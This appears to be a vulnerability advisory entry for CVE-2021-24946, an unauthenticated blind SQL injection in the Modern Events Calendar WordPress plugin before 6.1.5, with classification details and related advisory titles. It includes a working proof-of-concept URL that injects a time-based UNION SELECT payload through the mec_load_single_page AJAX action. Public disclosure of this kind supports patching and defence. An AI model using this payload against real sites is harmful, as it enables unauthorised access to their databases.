Modern Events Calendar < 6.1.5 – Unauthenticated Blind SQL Injection | CVE 2021-24946

Description

The plugin does not sanitise and escape the time parameter before using it in a SQL statement in the mec_load_single_page AJAX action, available to unauthenticated users, leading to an unauthenticated SQL injection issue

Proof of Concept

https://example.com/wp-admin/admin-ajax.php?action=mec_load_single_page&time=1))%20UNION%20SELECT%20sleep(10)%20--%20g

Affects Plugins

modern-events-calendar-lite

Fixed in 6.1.5

References

CVE

CVE-2021-24946

Classification

Type

SQLI

OWASP top 10

A1: Injection

CWE

CWE-89

CVSS

8.6 (high)

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

09871847-1d6a-4dfe-8a8c-f2f53ff87445

Timeline

Publicly Published

2021-11-15 (about 2 years ago)

Added

2021-11-15 (about 2 years ago)

Last Updated

2022-04-11 (about 2 years ago)

Other

Published

Title

Published

2017-03-09

Title

DTracker 1.5 - Multiple Unauthenticated Blind SQL Injections

Published

2023-04-17

Title

Avirato hotels online booking engine <= 5.0.5 - Subscriber+ SQLi

Published

2014-08-01

Title

ActiveHelper LiveHelp Server 3.2.2 - server/import/javascript.php Multiple Vector SQL Injection

Published

2024-01-16

Title

Delhivery Logistics Courier <= 1.0.107 - Authenticated (Subscriber+) SQL Injection

Published

2023-02-23

Title

ReviewX < 1.6.4 - Subscriber+ SQLi